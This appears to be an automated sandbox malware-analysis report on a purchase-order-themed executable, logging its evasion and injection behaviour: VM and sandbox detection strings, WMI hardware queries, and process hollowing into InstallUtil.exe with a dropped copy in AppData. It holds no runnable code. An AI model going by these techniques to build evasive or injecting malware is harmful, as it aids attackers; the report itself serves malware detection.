                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4800000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: CA0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 49F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: Xpnzea.exe, 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: Xpnzea.exe, 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: InstallUtil.exe, 00000007.00000002.1727595949.0000000005B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%|
                        Source: InstallUtil.exe, 00000009.00000002.2702774592.0000000005C90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllodeE
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1464343248.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1642858240.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1625844362.0000000001101000.00000004.00000020.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1702993833.0000000000968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 770000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 770000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 770000Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 772000Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7AC000Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7AE000Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 429008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 628008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 819008Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeQueries volume information: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeQueries volume information: C:\Users\user\AppData\Roaming\Xpnzea.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
